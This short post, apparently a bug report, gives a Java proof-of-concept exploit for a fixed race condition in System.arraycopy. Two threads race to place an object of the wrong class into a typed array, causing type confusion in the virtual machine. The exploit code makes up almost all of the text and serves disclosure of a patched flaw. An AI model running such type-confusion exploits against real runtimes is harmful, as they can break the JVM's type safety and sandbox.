Here is a simple PoC exploit for the issue fixed here:
class Union1 { }
class Union2 { }
class arraytoctou {
static volatile Union1 u1 = new Union1();
public static void main(String[] args) {
final Union1[] arr1 = new Union1[1];
final Union2[] arr2 = new Union2[1];
new Thread() {
public void run() {
for(;;) {
try {
System.arraycopy(arr1, 0, arr2, 0, 1);
if (arr2[0] != null) break;
} catch (Exception _) { }
}
}
}.start();
while (arr2[0] == null) {
arr1[0] = null;
arr1[0] = u1;
}
System.out.println(arr2[0]);
}
}